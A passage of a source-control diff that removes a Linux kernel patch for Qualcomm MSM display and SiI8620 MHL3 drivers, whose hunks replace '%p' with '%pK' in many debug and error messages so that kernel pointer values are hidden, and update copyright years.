- lut_cfg_data->version, lut_cfg_data->cfg_payload);
- return -EINVAL;
- }
-@@ -438,7 +438,7 @@ static int pp_hist_lut_set_config(char __iomem *base_addr,
- char __iomem *hist_addr = NULL, *swap_addr = NULL;
-
- if (!base_addr || !cfg_data || !pp_sts) {
-- pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- base_addr, cfg_data, pp_sts);
- return -EINVAL;
- }
-@@ -464,12 +464,12 @@ static int pp_hist_lut_set_config(char __iomem *base_addr,
- }
- lut_data = lut_cfg_data->cfg_payload;
- if (!lut_data) {
-- pr_err("invalid hist_lut cfg_payload %p\n", lut_data);
-+ pr_err("invalid hist_lut cfg_payload %pK\n", lut_data);
- return -EINVAL;
- }
-
- if (lut_data->len != ENHIST_LUT_ENTRIES || !lut_data->data) {
-- pr_err("invalid hist_lut len %d data %p\n",
-+ pr_err("invalid hist_lut len %d data %pK\n",
- lut_data->len, lut_data->data);
- return -EINVAL;
- }
-@@ -533,7 +533,7 @@ static int pp_dither_set_config(char __iomem *base_addr,
- uint32_t *pdata = NULL;
-
- if (!base_addr || !cfg_data || !pp_sts) {
-- pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- base_addr,
cfg_data, pp_sts);
- return -EINVAL;
- }
-@@ -560,7 +560,7 @@ static int pp_dither_set_config(char __iomem *base_addr,
-
- dither_data = dither_cfg_data->cfg_payload;
- if (!dither_data) {
-- pr_err("invalid payload for dither %p\n", dither_data);
-+ pr_err("invalid payload for dither %pK\n", dither_data);
- return -EINVAL;
- }
-
-@@ -608,7 +608,7 @@ static int pp_hist_get_config(char __iomem *base_addr, void *cfg_data,
- struct pp_hist_col_info *hist_info = NULL;
-
- if (!base_addr || !cfg_data) {
-- pr_err("invalid params base_addr %p cfg_data %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK\n",
- base_addr, cfg_data);
- return -EINVAL;
- }
-@@ -646,7 +646,7 @@ static int pp_get_hist_offset(u32 block, u32 *ctl_off)
- int ret = 0;
-
- if (!ctl_off) {
-- pr_err("invalid params ctl_off %p\n", ctl_off);
-+ pr_err("invalid params ctl_off %pK\n", ctl_off);
- return -EINVAL;
- }
- switch (block) {
-@@ -667,7 +667,7 @@ static int pp_get_hist_offset(u32 block, u32 *ctl_off)
- static int pp_get_hist_isr(u32 *isr_mask)
- {
- if (!isr_mask) {
-- pr_err("invalid params isr_mask %p\n", isr_mask);
-+ pr_err("invalid params isr_mask %pK\n", isr_mask);
- return -EINVAL;
- }
-
-@@ -693,7 +693,7 @@ static int pp_gamut_get_config(char __iomem *base_addr, void *cfg_data,
- u32 clk_gate_disable = 0;
-
- if (!base_addr || !cfg_data) {
-- pr_err("invalid params base_addr %p cfg_data %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK\n",
- base_addr, cfg_data);
- return -EINVAL;
- }
-@@ -831,7 +831,7 @@ static int pp_gamut_set_config(char __iomem *base_addr,
- struct mdp_gamut_data_v1_7 *gamut_data = NULL;
- char __iomem *base_addr_scale = base_addr;
- if (!base_addr || !cfg_data || !pp_sts) {
-- pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- base_addr, cfg_data, pp_sts);
- return -EINVAL;
- }
-@@ -853,7 +853,7 @@ static int pp_gamut_set_config(char __iomem *base_addr,
-
gamut_data = (struct mdp_gamut_data_v1_7 *)
- gamut_cfg_data->cfg_payload;
- if (!gamut_data) {
-- pr_err("invalid payload for gamut %p\n", gamut_data);
-+ pr_err("invalid payload for gamut %pK\n", gamut_data);
- return -EINVAL;
- }
-
-@@ -872,7 +872,7 @@ static int pp_gamut_set_config(char __iomem *base_addr,
- for (i = 0; i < MDP_GAMUT_TABLE_NUM_V1_7; i++) {
- if (!gamut_data->c0_data[i] || !gamut_data->c1_c2_data[i]
- || (gamut_data->tbl_size[i] != tbl_sz)) {
-- pr_err("invalid param for c0 %p c1c2 %p table %d size %d expected sz %d\n",
-+ pr_err("invalid param for c0 %pK c1c2 %pK table %d size %d expected sz %d\n",
- gamut_data->c0_data[i],
- gamut_data->c1_c2_data[i], i,
- gamut_data->tbl_size[i], tbl_sz);
-@@ -883,7 +883,7 @@ static int pp_gamut_set_config(char __iomem *base_addr,
- (!gamut_data->scale_off_data[i] ||
- (gamut_data->tbl_scale_off_sz[i] !=
- MDP_GAMUT_SCALE_OFF_SZ))) {
-- pr_err("invalid param for scale table %p for c%d size %d expected size%d\n",
-+ pr_err("invalid param for scale table %pK for c%d size %d expected size%d\n",
- gamut_data->scale_off_data[i], i,
- gamut_data->tbl_scale_off_sz[i],
- MDP_GAMUT_SCALE_OFF_SZ);
-@@ -948,7 +948,7 @@ static int pp_pcc_set_config(char __iomem *base_addr,
- u32 opmode = 0;
-
- if (!base_addr || !cfg_data || !pp_sts) {
-- pr_err("invalid params base_addr %p cfg_data %p pp_sts %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK pp_sts %pK\n",
- base_addr, cfg_data, pp_sts);
- return -EINVAL;
- }
-@@ -963,7 +963,7 @@ static int pp_pcc_set_config(char __iomem *base_addr,
- }
- pcc_data = pcc_cfg_data->cfg_payload;
- if (!pcc_data) {
-- pr_err("invalid payload for pcc %p\n", pcc_data);
-+ pr_err("invalid payload for pcc %pK\n", pcc_data);
- return -EINVAL;
- }
-
-@@ -1033,7 +1033,7 @@ static int pp_pcc_get_config(char __iomem *base_addr, void *cfg_data,
- struct mdp_pcc_data_v1_7 pcc_data;
-
- if (!base_addr || !cfg_data) {
-- pr_err("invalid params base_addr %p cfg_data %p\n",
-+ pr_err("invalid
params base_addr %pK cfg_data %pK\n",
- base_addr, cfg_data);
- return -EINVAL;
- }
-@@ -1230,7 +1230,7 @@ static void pp_pa_set_six_zone(char __iomem *base_addr,
-
- if (!pa_data->six_zone_len || !pa_data->six_zone_curve_p0 ||
- !pa_data->six_zone_curve_p1) {
-- pr_err("Invalid six zone data: len %d curve_p0 %p curve_p1 %p\n",
-+ pr_err("Invalid six zone data: len %d curve_p0 %pK curve_p1 %pK\n",
- pa_data->six_zone_len,
- pa_data->six_zone_curve_p0,
- pa_data->six_zone_curve_p1);
-@@ -1348,7 +1348,7 @@ static int pp_pa_set_config(char __iomem *base_addr,
- int ret = 0;
-
- if (!base_addr || !cfg_data || !pp_sts) {
-- pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- base_addr, cfg_data, pp_sts);
- return -EINVAL;
- }
-@@ -1373,7 +1373,7 @@ static int pp_pa_set_config(char __iomem *base_addr,
-
- pa_data = pa_cfg_data->cfg_payload;
- if (!pa_data) {
-- pr_err("invalid payload for pa %p\n", pa_data);
-+ pr_err("invalid payload for pa %pK\n", pa_data);
- return -EINVAL;
- }
-
-@@ -1622,7 +1622,7 @@ static int pp_pa_get_config(char __iomem *base_addr, void *cfg_data,
- char __iomem *pa_hold_addr = NULL;
-
- if (!base_addr || !cfg_data) {
-- pr_err("invalid params base_addr %p cfg_data %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK\n",
- base_addr, cfg_data);
- return -EINVAL;
- }
-@@ -1755,7 +1755,7 @@ static int pp_igc_set_config(char __iomem *base_addr,
- u32 data;
-
- if (!base_addr || !cfg_data || !pp_sts) {
-- pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- base_addr, cfg_data, pp_sts);
- return -EINVAL;
- }
-@@ -1763,7 +1763,7 @@ static int pp_igc_set_config(char __iomem *base_addr,
- lut_cfg_data = (struct mdp_igc_lut_data *) cfg_data;
- if (lut_cfg_data->version != mdp_igc_v1_7 ||
- !lut_cfg_data->cfg_payload) {
-- pr_err("invalid igc version %d payload %p\n",
-+
pr_err("invalid igc version %d payload %pK\n",
- lut_cfg_data->version, lut_cfg_data->cfg_payload);
- return -EINVAL;
- }
-@@ -1782,7 +1782,7 @@ static int pp_igc_set_config(char __iomem *base_addr,
- lut_data = lut_cfg_data->cfg_payload;
- if (lut_data->len != IGC_LUT_ENTRIES || !lut_data->c0_c1_data ||
- !lut_data->c2_data) {
-- pr_err("invalid lut len %d c0_c1_data %p c2_data %p\n",
-+ pr_err("invalid lut len %d c0_c1_data %pK c2_data %pK\n",
- lut_data->len, lut_data->c0_c1_data, lut_data->c2_data);
- return -EINVAL;
- }
-@@ -1849,7 +1849,7 @@ static int pp_igc_get_config(char __iomem *base_addr, void *cfg_data,
- u32 data = 0, sz = 0;
-
- if (!base_addr || !cfg_data || block_type != DSPP) {
-- pr_err("invalid params base_addr %p cfg_data %p block_type %d\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK block_type %d\n",
- base_addr, cfg_data, block_type);
- return -EINVAL;
- }
-@@ -1861,7 +1861,7 @@ static int pp_igc_get_config(char __iomem *base_addr, void *cfg_data,
- if (lut_cfg_data->version != mdp_igc_v1_7 ||
- !lut_cfg_data->cfg_payload ||
- lut_cfg_data->block > IGC_MASK_MAX) {
-- pr_err("invalid igc version %d payload %p block %d\n",
-+ pr_err("invalid igc version %d payload %pK block %d\n",
- lut_cfg_data->version, lut_cfg_data->cfg_payload,
- lut_cfg_data->block);
- ret = -EINVAL;
-@@ -1926,7 +1926,7 @@ static int pp_pgc_set_config(char __iomem *base_addr,
- struct mdp_pgc_lut_data_v1_7 *pgc_data_v17 = NULL;
-
- if (!base_addr || !cfg_data || !pp_sts) {
-- pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- base_addr, cfg_data, pp_sts);
- return -EINVAL;
- }
-@@ -1952,13 +1952,13 @@ static int pp_pgc_set_config(char __iomem *base_addr,
-
- pgc_data_v17 = (struct mdp_pgc_lut_data_v1_7 *) pgc_data->cfg_payload;
- if (!pgc_data_v17) {
-- pr_err("invalid payload for GC %p\n", pgc_data_v17);
-+ pr_err("invalid payload for GC %pK\n", pgc_data_v17);
- return
-EINVAL;
- }
-
- if (pgc_data_v17->len != PGC_LUT_ENTRIES || !pgc_data_v17->c0_data ||
- !pgc_data_v17->c1_data || !pgc_data_v17->c2_data) {
-- pr_err("Invalid params entries %d c0_data %p c1_data %p c2_data %p\n",
-+ pr_err("Invalid params entries %d c0_data %pK c1_data %pK c2_data %pK\n",
- pgc_data_v17->len, pgc_data_v17->c0_data,
- pgc_data_v17->c1_data, pgc_data_v17->c2_data);
- return -EINVAL;
-@@ -2011,7 +2011,7 @@ static int pp_pgc_get_config(char __iomem *base_addr, void *cfg_data,
- struct mdp_pgc_lut_data *pgc_data = NULL;
- struct mdp_pgc_lut_data_v1_7 *pgc_data_v17 = NULL;
- if (!base_addr || !cfg_data) {
-- pr_err("invalid params base_addr %p cfg_data %p block_type %d\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK block_type %d\n",
- base_addr, cfg_data, block_type);
- return -EINVAL;
- }
-@@ -2019,7 +2019,7 @@ static int pp_pgc_get_config(char __iomem *base_addr, void *cfg_data,
- pgc_data_v17 = (struct mdp_pgc_lut_data_v1_7 *)
- pgc_data->cfg_payload;
- if (pgc_data->version != mdp_pgc_v1_7 || !pgc_data_v17) {
-- pr_err("invalid pgc version %d payload %p\n",
-+ pr_err("invalid pgc version %d payload %pK\n",
- pgc_data->version, pgc_data_v17);
- return -EINVAL;
- }
-@@ -2081,7 +2081,7 @@ static int pp_pgc_get_config(char __iomem *base_addr, void *cfg_data,
- static int pp_pcc_get_version(u32 *version)
- {
- if (!version) {
-- pr_err("invalid param version %p\n", version);
-+ pr_err("invalid param version %pK\n", version);
- return -EINVAL;
- }
- *version = mdp_pcc_v1_7;
-@@ -2091,7 +2091,7 @@ static int pp_pcc_get_version(u32 *version)
- static int pp_igc_get_version(u32 *version)
- {
- if (!version) {
-- pr_err("invalid param version %p\n", version);
-+ pr_err("invalid param version %pK\n", version);
- return -EINVAL;
- }
- *version = mdp_igc_v1_7;
-@@ -2101,7 +2101,7 @@ static int pp_igc_get_version(u32 *version)
- static int pp_pgc_get_version(u32 *version)
- {
- if (!version) {
-- pr_err("invalid param version %p\n", version);
-+
pr_err("invalid param version %pK\n", version);
- return -EINVAL;
- }
- *version = mdp_pgc_v1_7;
-@@ -2111,7 +2111,7 @@ static int pp_pgc_get_version(u32 *version)
- static int pp_pa_get_version(u32 *version)
- {
- if (!version) {
-- pr_err("invalid param version %p\n", version);
-+ pr_err("invalid param version %pK\n", version);
- return -EINVAL;
- }
- *version = mdp_pa_v1_7;
-@@ -2121,7 +2121,7 @@ static int pp_pa_get_version(u32 *version)
- static int pp_gamut_get_version(u32 *version)
- {
- if (!version) {
-- pr_err("invalid param version %p\n", version);
-+ pr_err("invalid param version %pK\n", version);
- return -EINVAL;
- }
- *version = mdp_gamut_v1_7;
-@@ -2131,7 +2131,7 @@ static int pp_gamut_get_version(u32 *version)
- static int pp_dither_get_version(u32 *version)
- {
- if (!version) {
-- pr_err("invalid param version %p\n", version);
-+ pr_err("invalid param version %pK\n", version);
- return -EINVAL;
- }
- *version = mdp_dither_v1_7;
-@@ -2141,7 +2141,7 @@ static int pp_dither_get_version(u32 *version)
- static int pp_hist_lut_get_version(u32 *version)
- {
- if (!version) {
-- pr_err("invalid param version %p\n", version);
-+ pr_err("invalid param version %pK\n", version);
- return -EINVAL;
- }
- *version = mdp_hist_lut_v1_7;
-diff --git a/drivers/video/msm/mdss/mdss_mdp_rotator.c b/drivers/video/msm/mdss/mdss_mdp_rotator.c
-index ac957a0..e5307da 100644
---- a/drivers/video/msm/mdss/mdss_mdp_rotator.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_rotator.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -190,11 +190,11 @@ static struct mdss_mdp_rot_pipe *mdss_mdp_rot_mgr_acquire_pipe(
- (free_rot_pipe->previous_session != rot);
-
- rot_pipe = free_rot_pipe;
-- pr_debug("find a free pipe %p\n", rot_pipe->pipe);
-+ pr_debug("find a free pipe %pK\n", rot_pipe->pipe);
- } else {
- rot_pipe = busy_rot_pipe;
- if (rot_pipe)
-- pr_debug("find a busy pipe %p\n", rot_pipe->pipe);
-+ pr_debug("find a busy pipe %pK\n", rot_pipe->pipe);
- }
-
- if (rot_pipe)
-diff --git a/drivers/video/msm/mdss/mdss_mdp_util.c b/drivers/video/msm/mdss/mdss_mdp_util.c
-index fba7c86..af4920c 100644
---- a/drivers/video/msm/mdss/mdss_mdp_util.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_util.c
-@@ -1052,7 +1052,7 @@ static int mdss_mdp_put_img(struct mdss_mdp_img_data *data, bool rotator,
- pr_debug("pmem buf=0x%pa\n", &data->addr);
- memset(&data->srcp_f, 0, sizeof(struct fd));
- } else if (!IS_ERR_OR_NULL(data->srcp_dma_buf)) {
-- pr_debug("ion hdl=%p buf=0x%pa\n", data->srcp_dma_buf,
-+ pr_debug("ion hdl=%pK buf=0x%pa\n", data->srcp_dma_buf,
- &data->addr);
- if (!iclient) {
- pr_err("invalid ion client\n");
-@@ -1211,8 +1211,9 @@ static int mdss_mdp_get_img(struct msmfb_data *img,
- data->addr += data->offset;
- data->len -= data->offset;
-
-- pr_debug("mem=%d ihdl=%p buf=0x%pa len=0x%lx\n", img->memory_id,
-- data->srcp_dma_buf, &data->addr, data->len);
-+ pr_debug("mem=%d ihdl=%pK buf=0x%pa len=0x%lx\n",
-+ img->memory_id, data->srcp_dma_buf,
-+ &data->addr, data->len);
- } else {
- mdss_mdp_put_img(data, rotator, dir);
- return ret ?
: -EOVERFLOW;
-@@ -1267,7 +1268,7 @@ static int mdss_mdp_map_buffer(struct mdss_mdp_img_data *data, bool rotator,
- data->addr += data->offset;
- data->len -= data->offset;
-
-- pr_debug("ihdl=%p buf=0x%pa len=0x%lx\n",
-+ pr_debug("ihdl=%pK buf=0x%pa len=0x%lx\n",
- data->srcp_dma_buf, &data->addr, data->len);
- } else {
- mdss_mdp_put_img(data, rotator, dir);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_wb.c b/drivers/video/msm/mdss/mdss_mdp_wb.c
-index c9b6945..993b8d6 100644
---- a/drivers/video/msm/mdss/mdss_mdp_wb.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_wb.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -95,7 +95,7 @@ struct mdss_mdp_data *mdss_mdp_wb_debug_buffer(struct msm_fb_data_type *mfd)
- ihdl = ion_alloc(iclient, img_size, SZ_4K,
- ION_HEAP(ION_SF_HEAP_ID), 0);
- if (IS_ERR_OR_NULL(ihdl)) {
-- pr_err("unable to alloc fbmem from ion (%p)\n", ihdl);
-+ pr_err("unable to alloc fbmem from ion (%pK)\n", ihdl);
- return NULL;
- }
-
-@@ -122,7 +122,7 @@ struct mdss_mdp_data *mdss_mdp_wb_debug_buffer(struct msm_fb_data_type *mfd)
- img->len = img_size;
- }
-
-- pr_debug("ihdl=%p virt=%p phys=0x%pa iova=0x%pa size=%u\n",
-+ pr_debug("ihdl=%pK virt=%pK phys=0x%pa iova=0x%pa size=%u\n",
- ihdl, videomemory, &mdss_wb_mem, &img->addr, img_size);
- }
- return &mdss_wb_buffer;
-@@ -437,7 +437,7 @@ static struct mdss_mdp_wb_data *get_user_node(struct msm_fb_data_type *mfd,
- list_for_each_entry(node, &wb->register_queue, registered_entry)
- if ((node->buf_data.p[0].srcp_ihdl == ihdl) &&
- (node->buf_info.offset == data->offset)) {
-- pr_debug("found fd=%d hdl=%p off=%x addr=%pa\n",
-+ pr_debug("found fd=%d hdl=%pK off=%x addr=%pa\n",
- data->memory_id, ihdl,
- data->offset,
-
&node->buf_data.p[0].addr);
-@@ -513,7 +513,7 @@ static void mdss_mdp_wb_free_node(struct mdss_mdp_wb_data *node)
- if (node->user_alloc) {
- buf = &node->buf_data.p[0];
-
-- pr_debug("free user mem_id=%d ihdl=%p, offset=%u addr=0x%pa\n",
-+ pr_debug("free user mem_id=%d ihdl=%pK, offset=%u addr=0x%pa\n",
- node->buf_info.memory_id,
- buf->srcp_ihdl,
- node->buf_info.offset,
-diff --git a/drivers/video/msm/mdss/mdss_util.c b/drivers/video/msm/mdss/mdss_util.c
-index 3a9ff9b..2f9dd44 100644
---- a/drivers/video/msm/mdss/mdss_util.c
-+++ b/drivers/video/msm/mdss/mdss_util.c
-@@ -33,7 +33,7 @@ int mdss_register_irq(struct mdss_hw *hw)
- if (!mdss_irq_handlers[hw->hw_ndx])
- mdss_irq_handlers[hw->hw_ndx] = hw;
- else
-- pr_err("panel %d's irq at %p is already registered\n",
-+ pr_err("panel %d's irq at %pK is already registered\n",
- hw->hw_ndx, hw->irq_handler);
- spin_unlock_irqrestore(&mdss_lock, irq_flags);
-
-diff --git a/drivers/video/msm/mdss/mhl3/mhl_linux_tx.c b/drivers/video/msm/mdss/mhl3/mhl_linux_tx.c
-index 1514f02..d3dc874 100644
---- a/drivers/video/msm/mdss/mhl3/mhl_linux_tx.c
-+++ b/drivers/video/msm/mdss/mhl3/mhl_linux_tx.c
-@@ -1,7 +1,7 @@
- /*
- * SiI8620 Linux Driver
- *
-- * Copyright (C) 2013-2014 Silicon Image, Inc.
-+ * Copyright (C) 2013-2014, 2016 Silicon Image, Inc.
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
-@@ -5599,7 +5599,7 @@ static int is_timer_handle_valid(struct mhl_dev_context *dev_context,
- }
-
- if (timer != timer_handle) {
-- MHL_TX_DBG_WARN("Invalid timer handle %p received\n",
-+ MHL_TX_DBG_WARN("Invalid timer handle %pK received\n",
- timer_handle);
- return -EINVAL;
- }
-diff --git a/drivers/video/msm/mdss/mhl3/mhl_supp.c b/drivers/video/msm/mdss/mhl3/mhl_supp.c
-index 7055d8c..de0e207 100644
---- a/drivers/video/msm/mdss/mhl3/mhl_supp.c
-+++ b/drivers/video/msm/mdss/mhl3/mhl_supp.c
-@@ -1,7 +1,7 @@
- /*
- * SiI8620 Linux Driver
- *
-- * Copyright (C) 2013-2014 Silicon Image, Inc.
-+ * Copyright (C) 2013-2014, 2016 Silicon Image, Inc.
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
-@@ -185,7 +185,7 @@ static struct cbus_req *get_free_cbus_queue_entry_impl(
- req->function = function;
- req->line = line;
- req->sequence = dev_context->sequence++;
-- /*MHL_TX_DBG_ERR(,"q %d get:0x%p %s:%d\n",
-+ /*MHL_TX_DBG_ERR(,"q %d get:0x%pK %s:%d\n",
- req->sequence,req,function,line); */
- return req;
- }
-@@ -197,7 +197,7 @@ static void return_cbus_queue_entry_impl(struct mhl_dev_context *dev_context,
- struct cbus_req *pReq,
- const char *function, int line)
- {
-- /* MHL_TX_DBG_ERR(,"q ret:0x%p %s:%d\n",pReq,function,line); */
-+ /* MHL_TX_DBG_ERR(,"q ret:0x%pK %s:%d\n",pReq,function,line); */
- list_add(&pReq->link, &dev_context->cbus_free_list);
-
- }
-@@ -372,7 +372,7 @@ static struct block_req *start_new_block_marshalling_req_impl(
- sizeof(payload->as_bytes) -
- sizeof(struct SI_PACK_THIS_STRUCT standard_transport_header_t);
- dev_context->block_protocol.marshalling_req = req;
-- MHL_TX_DBG_WARN("q %d get:0x%p %s:%d\n", req->sequence, req, function,
-+ MHL_TX_DBG_WARN("q %d get:0x%pK %s:%d\n", req->sequence, req, function,
- line);
-
return req;
- }
-@@ -384,7 +384,7 @@ static void return_block_queue_entry_impl(struct mhl_dev_context *dev_context,
- struct block_req *pReq,
- const char *function, int line)
- {
-- /* MHL_TX_DBG_ERR(,"q ret:0x%p %s:%d\n",pReq,function,line); */
-+ /* MHL_TX_DBG_ERR(,"q ret:0x%pK %s:%d\n",pReq,function,line); */
- list_add(&pReq->link, &dev_context->block_protocol.free_list);
-
- }
-@@ -1283,7 +1283,7 @@ void si_mhl_tx_drive_states(struct mhl_dev_context *dev_context)
- if (req == NULL)
- return;
-
-- MHL_TX_DBG_INFO("req: %p\n", req);
-+ MHL_TX_DBG_INFO("req: %pK\n", req);
- /* coordinate write burst requests and grants. */
- if (MHL_MSC_MSG == req->command) {
- dev_context->msc_msg_last_data = req->msg_data[1];
-@@ -1298,7 +1298,7 @@ void si_mhl_tx_drive_states(struct mhl_dev_context *dev_context)
- }
- }
-
-- MHL_TX_DBG_INFO("req: %p\n", req);
-+ MHL_TX_DBG_INFO("req: %pK\n", req);
- if (req) {
- uint8_t ret_val;
- dev_context->current_cbus_req = req;
-diff --git a/drivers/video/msm/mdss/mhl3/platform.c b/drivers/video/msm/mdss/mhl3/platform.c
-index c0e5174..16ce64e 100644
---- a/drivers/video/msm/mdss/mhl3/platform.c
-+++ b/drivers/video/msm/mdss/mhl3/platform.c
-@@ -1,7 +1,7 @@
- /*
- * SiI8620 Linux Driver
- *
-- * Copyright (C) 2013-2014 Silicon Image, Inc.
-+ * Copyright (C) 2013-2014, 2016 Silicon Image, Inc.
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
-@@ -1590,7 +1590,7 @@ static int __devinit si_8620_mhl_tx_i2c_probe(struct i2c_client *client,
- {
- int ret;
-
-- pr_info("%s(), i2c_device_id = %p\n", __func__, id);
-+ pr_info("%s(), i2c_device_id = %pK\n", __func__, id);
-
- #if defined(SIMG_USE_DTS)
- /*
-@@ -1844,7 +1844,7 @@ static int __devinit si_8620_mhl_tx_spi_probe(struct spi_device *spi)
- {
- int ret;
-
-- pr_info("%s(), spi = %p\n", __func__, spi);
-+ pr_info("%s(), spi = %pK\n", __func__, spi);
- spi->bits_per_word = 8;
- spi_dev = spi;
- spi_bus_num = spi->master->bus_num;
-@@ -2161,7 +2161,7 @@ static void __exit si_8620_exit(void)
- for (idx = 0; idx < ARRAY_SIZE(device_addresses); idx++) {
- MHL_TX_DBG_INFO("\n");
- if (device_addresses[idx].client != NULL) {
-- MHL_TX_DBG_INFO("unregistering device:%p\n",
-+ MHL_TX_DBG_INFO("unregistering device:%pK\n",
- device_addresses[idx].client);
- i2c_unregister_device(device_addresses[idx].
- client);
-diff --git a/drivers/video/msm/mdss/mhl3/si_8620_drv.c b/drivers/video/msm/mdss/mhl3/si_8620_drv.c
-index dd71f1b..9d68f28 100644
---- a/drivers/video/msm/mdss/mhl3/si_8620_drv.c
-+++ b/drivers/video/msm/mdss/mhl3/si_8620_drv.c
-@@ -2367,7 +2367,7 @@ int si_mhl_tx_drv_get_edid_fifo_partial_block(struct drv_hw_context *hw_context,
- offset = EDID_BLOCK_SIZE * (hw_context->edid_fifo_block_number & 0x01);
- offset += start;
-
-- MHL_TX_DBG_INFO("%p %p\n", hw_context, edid_buf);
-+ MHL_TX_DBG_INFO("%pK %pK\n", hw_context, edid_buf);
- if (EDID_BLOCK_SIZE == (offset + length))
- hw_context->edid_fifo_block_number++;
-
-@@ -2401,7 +2401,7 @@ int si_mhl_tx_drv_get_edid_fifo_next_block(struct drv_hw_context *hw_context,
-
- offset = EDID_BLOCK_SIZE * (hw_context->edid_fifo_block_number & 0x01);
-
-- MHL_TX_DBG_INFO("%p %p\n", hw_context, edid_buf);
-+ MHL_TX_DBG_INFO("%pK %pK\n", hw_context, edid_buf);
- hw_context->edid_fifo_block_number++;
-
- #ifdef MANUAL_EDID_FETCH
-diff --git a/drivers/video/msm/mdss/mhl3/si_emsc_hid.c b/drivers/video/msm/mdss/mhl3/si_emsc_hid.c
-index 17d33c9..52acb26 100644
---- a/drivers/video/msm/mdss/mhl3/si_emsc_hid.c
-+++ b/drivers/video/msm/mdss/mhl3/si_emsc_hid.c
-@@ -1,8 +1,8 @@
- /*
- * MHL3 HID Tunneling implementation
- *
-- * Copyright (c) 2013-2014 Lee Mulcahy
-- * Copyright (c) 2013-2014 Silicon Image, Inc
-+ * Copyright (c) 2013-2014, 2016 Lee Mulcahy
-+ * Copyright (c) 2013-2014, 2016 Silicon Image, Inc
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
-@@ -461,7 +461,7 @@ static int mhl3_send_ack(struct mhl3_hid_data *mhid, uint8_t reason)
- return -ENODEV;
-
- MHL3_HID_DBG_WARN("%s - HID_ACK reason code: %02X\n", __func__, reason);
-- MHL3_HID_DBG_ERR("mhid->mdev: %p\n", mhid->mdev);
-+ MHL3_HID_DBG_ERR("mhid->mdev: %pK\n", mhid->mdev);
- mhid->out_data[0] = MHL3_HID_ACK;
- mhid->out_data[1] = reason;
-
-@@ -1089,7 +1089,7 @@
mhid_cleanup:
- mhl3_send_ack(mhid, HID_ACK_NODEV);
-
- mhid->flags |= HID_FLAGS_WQ_CANCEL;
-- MHL3_HID_DBG_ERR("WORK QUEUE function FAIL - mhid: %p\n", mhid);
-+ MHL3_HID_DBG_ERR("WORK QUEUE function FAIL - mhid: %pK\n", mhid);
- mhl3_disconnect_and_destroy_hid_device(mhid);
-
- /*
-diff --git a/drivers/video/msm/mdss/mhl3/si_mdt_inputdev.c b/drivers/video/msm/mdss/mhl3/si_mdt_inputdev.c
-index 13d2a08..573684a1 100644
---- a/drivers/video/msm/mdss/mhl3/si_mdt_inputdev.c
-+++ b/drivers/video/msm/mdss/mhl3/si_mdt_inputdev.c
-@@ -1,7 +1,7 @@
- /*
- * SiI8620 Linux Driver
- *
-- * Copyright (C) 2013-2014 Silicon Image, Inc.
-+ * Copyright (C) 2013-2014, 2016 Silicon Image, Inc.
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
-@@ -80,10 +80,11 @@ static void destroy_mouse(struct mhl_dev_context *dev_context)
- if (dev_context->mdt_devs.dev_mouse == NULL)
- return;
-
-- MHL_TX_DBG_INFO("Unregistering mouse: %p\n",
-+ MHL_TX_DBG_INFO("Unregistering mouse: %pK\n",
- dev_context->mdt_devs.dev_mouse);
- input_unregister_device(dev_context->mdt_devs.dev_mouse);
-- MHL_TX_DBG_INFO("Freeing mouse: %p\n", dev_context->mdt_devs.dev_mouse);
-+ MHL_TX_DBG_INFO("Freeing mouse: %pK\n",
-+ dev_context->mdt_devs.dev_mouse);
- input_free_device(dev_context->mdt_devs.dev_mouse);
- dev_context->mdt_devs.dev_mouse = NULL;
- }
-@@ -93,10 +94,10 @@ static void destroy_keyboard(struct mhl_dev_context *dev_context)
- if (dev_context->mdt_devs.dev_keyboard == NULL)
- return;
-
-- MHL_TX_DBG_INFO("Unregistering keyboard: %p\n",
-+ MHL_TX_DBG_INFO("Unregistering keyboard: %pK\n",
- dev_context->mdt_devs.dev_keyboard);
- input_unregister_device(dev_context->mdt_devs.dev_keyboard);
-- MHL_TX_DBG_INFO("Freeing keyboard: %p\n",
-+ MHL_TX_DBG_INFO("Freeing keyboard: %pK\n",
- dev_context->mdt_devs.dev_keyboard);
- input_free_device(dev_context->mdt_devs.dev_keyboard);
- dev_context->mdt_devs.dev_keyboard = NULL;
-@@ -107,10 +108,10 @@ static void destroy_touchscreen(struct mhl_dev_context *dev_context)
